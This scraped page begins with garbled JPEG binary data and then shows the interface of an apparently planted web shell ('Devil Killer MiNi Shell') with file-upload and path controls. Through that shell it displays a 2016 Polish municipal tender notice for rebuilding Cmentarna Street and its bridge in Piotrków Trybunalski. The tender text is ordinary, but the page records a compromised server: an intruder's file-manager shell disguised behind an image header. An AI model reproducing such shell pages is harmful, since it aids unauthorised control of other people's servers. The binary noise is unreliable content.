JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160427/104978-N-2016.html

<p class="kh_header"><b>Piotrków Trybunalski: PRZEBUDOWĘ ULICY CMENTARNEJ W PIOTRKOWIE TRYBUNALSKIM</b><br>
<b>Numer ogłoszenia: 104978 - 2016; data zamieszczenia: 27.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Piotrków Trybunalski , ul. Pasaż Rudowskiego 10, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7327796, faks 044 7327798.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWĘ ULICY CMENTARNEJ W PIOTRKOWIE TRYBUNALSKIM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres rzeczowy  obejmuje:
Przebudowa ulicy Cmentarnej w Piotrkowie Trybunalskim.

1.ROBOTY DROGOWE
Przebudowa I odcinka ulicy Cmentarnej na odcinku od ulicy Wojska Polskiego wraz z mostem na rzece Strawie. II odcinek ulicy Cmentarnej od mostu do ul. Partyzantów będzie realizowany w terminie późniejszym.
Uwaga:  Jedynie odcinek I ulicy Cmentarnej podlega wycenie. Projekt Techniczny obejmuje całość ulicy Cmentarnej od ul. Wojska Polskiego do ul. Partyzantów.W projektowanym rozwiązaniu ulica ma szerokość 5,5m.
Zakres robót: 
- roboty rozbiórkowe - frezowanie
- roboty ziemne
- budowę nawierzchni drogowych
- dostosowanie konstrukcji jezdni w celu uzyskania parametrów wymaganych dla obciążenia 100kN;
- chodniki obustronne o szerokości zmiennej, do granicy pasa drogowego,
- zjazdy wyłukowania włączeń mają promienie 6m, ukosowania zjazdów 1:1 
- montaż elementów małej architektury (ławki, kosze, kraty wokół drzew)
- ułożenie ziemi darniowej grub. 10 cm pod kratami i trawnikami
- ułożenie trawników z rolki
- pielęgnacja drzew wraz z wywozem dłużyc, karpiny i gałęzi
- W granicach pasa drogowego posesja nr 7 posiada schody do podpiwniczenia oraz przyokienne wnęki okien piwnicznych. W związku z wyrównaniem poziomu chodnika należy dobudować 1 stopień schodów i podwyższyć murki oporowe wnęk okiennych.
- Schody z ulicy Cmentarnej na skwer wybudować z kostki betonowej
- Odsłonięte po wykonaniu chodnika ściany przyziemia należy uzupełnić tynkiem.

1.1.organizacja ruchu
Czasowa organizacja ruchu wg opracowanego projektu.
Stała organizacja ruchu wg opracowanego projektu.
Zaprojektowano oznakowanie poziome chemoutwardzalne, ciągłe i oznakowanie pionowe.

2.ROBOTY MOSTOWE:
Zakres robót dla całego zamierzenia budowlanego oraz kolejność realizacji poszczególnych elementów obejmuje:
- rozbiórkę istniejącego obiektu żelbetowego
- wykonanie wykopów pod przyczółki
- wykonanie monolitycznych żelbetowych korpusów przyczółków na palach
- wykonanie płyty żelbetowej pomostu,
- wykonanie stalowej balustrady
- wykonanie nawierzchni drogowych na płycie
- wykonanie chodnika
- zagospodarowanie placu budowy
Na obiekcie zlokalizowane są sieci rurowe i kablowe, kanały, wyloty kanalizacji których przebudowę należy prowadzić zgodnie z projektami branżowymi. Niedopuszczalne jest wykonanie mostu bez uwzględnienia projektów branżowych opracowanych dla przebudowy całej ulicy Cmentarnej. Na etapie prac rozbiórkowych należy zwrócić uwagę na istniejące sieci prowadzone przez obiekt i nie dopuścić do ich uszkodzenia.
Należy wyrównać ewentualną różnicę niwelety nawierzchni na projektowanym moście w stosunku do istniejącego II odcinka ulicy Cmentarnej.

3.	ROBOTY INSTALACYJNE
3.1.	Przebudowa sieci wodociągowej na odcinku od ZL6 do TR1 wraz z przyłączami na tym odcinku z rur PE100 SDR11 PN 12.5 trójwarstwowych, na docinku przejścia przez obiekt mostowy rury żeliwne sferoidalne DN100 fabrycznie preizolowane.
3.2.	W węzłach na przebudowywanej sieci wodociągowej i na podejściach pod hydranty zaprojektowano zasuwy odcinające. Zasuwy muszą posiadać aktualne dopuszczenie Centrum Naukowo-Badawczego Ochrony Przeciwpożarowej im. Józefa Tuliszkowskiego w Józefowie, oraz Stowarzyszenia Ochrony Antykorozyjnej GSK-RAL.
zasuwa klinowa kołnierzowa z miękkim uszczelnieniem klina.
korpus i pokrywa zasuwy wykonana z żeliwa sferoidalnego GGG 50 malowane farbą epoksydową
trzpień ze stali nierdzewnej
zasuwa z pełnym przelotem
klin z żeliwa sferoidalnego, nawulkanizowany elastomerem trzpień ze stali nierdzewnej, gwint walcowany oraz polerowany
uszczelnienie trzpienia składające się z: uszczelki wargowej oraz min. 3 O-ringów
śruby łączące pokrywę z korpusem wpuszczone i zabezpieczone masą zalewową
nakrętka klina wykonana z metalu kolorowego
kołnierze zwymiarowane i owiercone zgodnie z PN-EN1092-2
wymagana ochrona antykorozyjna: zewnętrznie i wewnętrznie powłoka z farby epoksydowej wykonywana metodą fluidyzacji, potwierdzona certyfikatem GSK-RAL.
deklaracje zgodności z PN 
aktualne atesty PZH
Zasuwy przyłączeniowe:
zasuwa- (korpus + pokrywa) żeliwo sferoidalne- malowane farbą epoksydową
potrójne uszczelnienie trzpienia
klin nawulkanizowany powłoką EPDM
trzpień ze stali nierdzewnej walcowany
Obejmy:
korpus wykonany z żeliwa sferoidalnego
zabezpieczenie antykorozyjne (wewnątrz i zewnątrz) poprzez pokrywanie żywicą epoksydową w technologii fluidyzacyjnej
śruby, nakrętki i podkładki wykonane ze stali nierdzewnej
uszczelka wykonana z elastomeru dopuszczonego do kontaktu z wodą pitną
korpus z odejściem gwintowanym lub kołnierzowym
3.3.	Hydranty nadziemne DN 100. Hydranty muszą posiadać aktualne dopuszczenie Centrum Naukowo-Badawczego Ochrony Przeciwpożarowej im. Józefa Tuliszkowskiego w Józefowie, oraz Stowarzyszenia Ochrony Antykorozyjnej GSK-RAL. Projektuje się hydranty mrozoodporne z automatycznym odwodnieniem z dodatkowym zamknięciem kulowym zabezpieczającym przed wypływem wody w przypadku złamania. Projektuje się hydrant wykonany z następujących materiałów:
głowica - żeliwo szare
wrzeciono - stal nierdzewna
uszczelnienie wrzeciona - typu o-ring z gumy NBR
kolumna - żeliwo sferoidalne typu GGG 400 lub stal nierdzewna
stopa montażowa, obudowa kuli - żeliwo sferoidalne typu GGG 400
ochrona antykorozyjna - na zewnątrz powłoka z farby epoksydowej nanoszona elektrostatycznie z dodatkowym lakierem nawierzchniowym odpornym na działanie UV. Zabezpieczenie dolnej części korpusu hydrantu za pomocą otuliny z korpusu PE-HD i włókniny wykonanej z polipropylenu.
przyłącze kołnierzowe do posadowienia na kolanie stopowym zgodnie z normą: PN-EN 1092-2:1999 Kołnierze żeliwne i ich połączenia. Kołnierze okrągłe do rur, armatur i osprzętu z oznaczeniem PN. Kołnierze żeliwne.
owiercenie kołnierzy ośmiootworowe , zgodnie z PN-EN 1092-2:1999
3.4.	Zawory napowietrzająco-odpowietrzające.: Na przebudowywanym wodociągu rozdzielczym zaprojektowano zawory napowietrzająco - odpowietrzjące dn 50, PN16 do bezpośredniej zabudowy w ziemi. Montaż zaworu napowietrzająco - odpowietrzjącego bezpośrednio na trójniku. Na poziomie terenu zawór należy obudować skrzynką uliczną żeliwną dużą. Połączenia kołnierzowe PN16 uszczelniać na uszczelki gumowe z wkładką stalową, do połączeń kołnierzowych stosować śruby, nakrętki i podkładki stalowe zabezpieczone antykorozyjnie min. przez ocynkownie ogniowe.
3.5.	Sieć kanalizacji deszczowej z rur PVC SN8 lity 315 9,2, 200 5,9 na odcinku Wyl1 - D5. Wylot z rury betonowej DN300, studnie DN600, studnie żelbetowe DN1200, DN1200 z osadnikiem - fabrycznie wykonane kinety oraz przejścia szczelne, włazy z wypełnieniem betonowym z trwale osadzoną uszczelką we włazie, wpusty żelbetowe DN500 z włazem klasy D400 uchylnym na zawiasach.
3.6.	Sieć kanalizacji sanitarnej z rur PVC SN8 lity 200  5,9 na odcinku S6 - włączenie do istniejącej komory na kolektorze, studnie żelbetowe DN1200 - fabrycznie wykonane kinety oraz przejścia szczelne, włazy z wypełnieniem betonowym z trwale osadzoną uszczelką we włazie, zasuwa nożowa DN250 w studni S6.

4.	ROBOTY ELEKTRYCZNE
4.1.Oświetlenie uliczne w pełnym zakresie projektu:
Oświetlenie uliczne obejmuje budowę nowego oświetlenia ulicznego od ulicy Wojska Polskiego do ulicy Partyzantów wraz z podłączeniem napowietrznym opraw oświetleniowych w ul. Partyzantów przy kaplicy i obok wejścia na cmentarz.
Projektowane oświetlenie uliczne podłącza się do istniejącej sieci zgodnie z warunkami
technicznymi. Ewentualne materiały uzyskane z demontażu podlegają utylizacji na koszt wykonawcy robót.
4.2 Słupy oświetleniowe
Projektuje się słupy oświetleniowe rurowe stalowe okrągłe typu ST4   131, o wysokości
punktu świetlnego 6,0 m z wysięgnikiem o długości 0,6m typu R14. Zaprojektowano słupy oświetleniowe wraz z niezbędnym osprzętem (fundament i tabliczka słupowa) ustawionych w odstępach średnio co 30m. Słupy Art-Metal zostały wskazane wyłącznie jako przykładowe aby na etapie realizacji prac zachować wskazaną i zaakceptowaną przez konserwatora formę architektoniczną możliwie zbliżoną do wskazanej.
Słupy uziemić za pomocą bednarki ocynkowanej 30   4mm, prowadzonej w wykopie. Wartość rezystancji R   10   . Należy zachować minimalną skrajnię drogową.
4.3 Oprawa oświetlenia ulicznego
Projektuje się budowę nowego oświetlenia ulicznego z oprawami energooszczędnymi 
w technologii typu LED - 48 LED 500mA NW o mocy 70W o barwie światła 3300K. Obliczenia wykonano dla lamp Albany LED midi. Oprawa winna być wyposażona w układ zasilający, który może mieć ustawionych do 5-ciu poziomów autonomicznej redukcji mocy, niewymagającej sterowania sygnałem  zewnętrznym. Poziomy redukcji ustalić z inwestorem na etapie realizacji. Wstępnie proponuje się trzy okresy dobowe zmiany poziomu natężenia oświetlenia: 
pierwszy od godz. 5.00 do godz. 22.30 -100 proc,
drugi od godz. 22.30 do godz. 24.00 - 70proc,
trzeci od godz. 0.00 do godz. 5.00 - 50proc.
Od dwóch zacisków programowalnych zasilacza lampy poprowadzić przewód YLY 2     1 mm2 do tabliczki bezpiecznikowej z zapasem min. 0,5 m.
4.4.	Usuniecie kolizji z siecią teletechniczną:
Przesunięcie studni teletechnicznej poza obszar kolizji z krawężnikiem.
Zabezpieczenie kabli teletechnicznych.
4.5.Usunięcie kolizji z siecią kablową  NN:
Linie kablowe pod ulicą należy osłonić rurami dwudzielnymi typu DVK fi 160.
4.6.	Roboty demontażowe:
Istniejących 25 słupów  i przęsła linii napowietrznej nn należy zdemontować, całość materiałów z demontażu podlega utylizacji na koszt wykonawcy robót.

5.Wymagania dotyczące materiałów
Wszystkie wyroby użyte do budowy muszą posiadać: 
Certyfikat na znak bezpieczeństwa wykazując, że zapewniono zgodność z kryteriami właściwych przepisów i dokumentów technicznych.
Deklarację zgodności lub certyfikat zgodności z: Polską Normą, Normą Europejską lub Aprobatą Techniczną, w przypadku wyrobów, dla których nie ustanowiono normy, jeżeli nie są objęte certyfikacją. 
Oświadczenia kierownika budowy i kierowników robót, że wyroby budowlane zostały dopuszczone do stosowania w budownictwie i posiadały odpowiednie oznakowania B lub CE oraz załączoną informację o wyrobie.
Kontroli jakości materiałów i wykonywanych robót (powołanych w projektach 
lub równoważnych o nie gorszych parametrach) dokonują w imieniu Zamawiającego inspektorzy nadzoru inwestorskiego, zgodnie z przepisami ustawy prawo budowlane, specyfikacjami technicznymi.
Inwestor dopuszcza stosowanie innego typu osprzętu i wyposażenia niż 
w dokumentacji pod warunkiem zachowania tych samych danych technicznych i standardów jakościowych elementów wskazanych dokumentacją i przedmiarami. Oferta winna podać typy proponowanego osprzętu i wyposażenia jak powyżej.
Materiały kwalifikujące się do ponownego wbudowania należy składować w miejscu wskazanym przez Zarząd Dróg i Utrzymania Miasta w Piotrkowie Trybunalskim. Natomiast pozostałe materiały rozbiórkowe są utylizowane na koszt wykonawcy.
6.Wymagania ogólne wykonania robót
6.1.Zamówienie należy wykonać ściśle wg projektów budowlanych, wykonawczych i Specyfikacji Technicznych Wykonania i Odbioru Robót, które stanowią integralną część umowy. 
6.2.Podczas realizacji robót Wykonawca będzie przestrzegać przepisów dotyczących bezpieczeństwa i higieny pracy zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 6 lutego 2003 r. w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych (Dz. U. z 2003 r. Nr 47, poz. poz. 401).
6.3.	Wykonawca zobowiązany jest umieścić w swoim harmonogramie rezerwę czasową dla wszelkiego rodzaju robót, które mają być wykonane w zakresie przełożenia instalacji  i urządzeń podziemnych na terenie budowy i powiadomić inspektora nadzoru i władze lokalne o zamiarze rozpoczęcia robót. O fakcie przypadkowego uszkodzenia tych instalacji Wykonawca bezzwłocznie powiadomi inspektora nadzoru i zainteresowane władze oraz będzie z nimi współpracował dostarczając wszelkiej pomocy potrzebnej przy dokonywaniu napraw. Wykonawca będzie odpowiadać za wszelkie spowodowane przez jego działania uszkodzenia instalacji na powierzchni ziemi i urządzeń podziemnych wykazanych w dokumentach przekazanych mu przez Zamawiającego.
6.4.Wszelkie roboty ziemne w pobliżu istniejącego uzbrojenia Wykonawca jest zobowiązany wykonywać ręcznie pod nadzorem właściciela uzbrojenia, 
6.5.Wykonawca jest zobowiązany wykonać włączenie kanału deszczowego do sieci miejskiej w uzgodnieniu z ZDiUM,
6.6.Wykonawca odpowiada za ochronę instalacji na powierzchni ziemi i za urządzenia podziemne, takie jak rurociągi, kable itp. oraz uzyska od odpowiednich władz będących właścicielami tych urządzeń potwierdzenie informacji dostarczonych mu przez Zamawiającego w ramach planu ich lokalizacji. Wykonawca zapewni właściwe oznaczenie i zabezpieczenie przed uszkodzeniem tych instalacji i urządzeń w czasie trwania budowy,
6.7.Wymagane jest wykonanie siłami własnymi robót podstawowych - drogowych, stanowiących większość zakresu robót całego zadania.
6.8.Wykonawca będzie odpowiedzialny za szkody powstałe w przyległych budynkach i na graniczących z inwestycją terenach, a związane z prowadzonymi robotami.
7.Przed przystąpieniem do robót wykonawca zobowiązany będzie m.in. do:
7.1.	inwentaryzacji stanu technicznego budynków znajdujących się w strefie oddziaływania robót. Wymagane jest wykonanie dokumentacji fotograficznej.
7.2.	zgłoszenia do odpowiednich jednostek - gestorów sieci, celem poinformowania o ww. robotach i czasie ich trwania,
7.3.	zainstalowania w widocznych miejscach dwóch banerów  o wym. 2,0 na 1,0 m wg załączonego wzoru:
 
8.Wymagania dotyczące dokumentacji powykonawczej:
8.1.dokumentacja odbiorowa ma zawierać powykonawczą mapę inwentaryzacyjną, wraz z wykazem pomiarów, potwierdzone przez uprawnionego geodetę.
8.2.termin sporządzenia i przekazania: na 7 dni przed terminem zakończenia, najpóźniej w dniu odbioru, 
8.3.ilość egzemplarzy: 3 egzemplarze dla każdej branży na koszt wykonawcy;
9.Przed przystąpieniem do przetargu należy:
9.1.dokonać wizji lokalnej obiektu w miejscu realizacji zamówienia,
9.2.zapoznać się z dokumentacją techniczną dotyczącą przedmiotowego zamówienia oraz Specyfikacjami Technicznymi Wykonania i Odbioru Robót. 
10.Przed podpisaniem umowy Wykonawca przedstawi Inwestorowi:
10.1.	polisę ubezpieczenia OC, obejmującą osoby trzecie, na cały okres realizacji zadania,
10.2.	harmonogram rzeczowo-finansowy realizacji robót do akceptacji
10.3.	kosztorys odpowiadający kwocie oferty,
10.4.	złożenia oświadczenia o wykonywaniu robót siłami własnymi lub z udziałem podwykonawców, których odpowiednie dokumenty powinna zawierać oferta, z tym że wyłoniony w niniejszym przetargu wykonawca będzie zobowiązany do wykonania siłami własnymi robót drogowych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.11.30.00-2, 45.11.00.00-1, 45.22.11.11-3, 45.23.32.00-1, 45.23.32.60-9, 45.23.13.00-8, 45.23.14.00-9, 31.52.72.00-8, 45.23.20.00-2, 45.23.32.21-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący posiadania wiedzy i doświadczenia, zamawiający uzna za spełniony w przypadku, gdy wykonawca:
a)wykaże co najmniej trzy zamówienia (wykonane w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) odpowiadające rodzajem przedmiotowi niniejszego zamówienia, tj. polegających na budowie lub przebudowie drogi wraz z infrastrukturą towarzyszącą (wg  ustawy Prawo budowlane Art. 3 pkt 6, 7a)  o wartości co najmniej 1.200.000,00 PLN każda - wg załącznika nr  4.
b)załączy dokumenty potwierdzające, że roboty wyszczególnione w załączniku  nr 4 zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Sposób dokonania oceny spełnienia wymaganych warunków:
przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów zawartych w ofercie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, zostanie przez zamawiającego uznany za spełniony w przypadku, gdy wykonawca wykaże 
i przedłoży: 
Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami  - wg załącznika nr 3. Osoby te muszą posiadać uprawnienia do pełnienia samodzielnej funkcji technicznej w budownictwie do kierowania robotami budowlanymi bez ograniczeń    w specjalnościach: 
Kierownik budowy - uprawnienia do pełnienia samodzielnej funkcji technicznej 
w budownictwie  o specjalności: w zakresie budowy dróg,
Kierownicy robót - uprawnienia do pełnienia samodzielnej funkcji technicznej  
w budownictwie o specjalności: instalacyjnej w zakresie sieci, instalacji 
i urządzeń: wodociągowych i kanalizacyjnych, w zakresie sieci elektrycznych 
i teletechnicznych (uprawnienia instalacyjne telekomunikacyjne).    

Sposób dokonania oceny spełnienia wymaganych warunków:
przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia, niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów zawartych w ofercie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

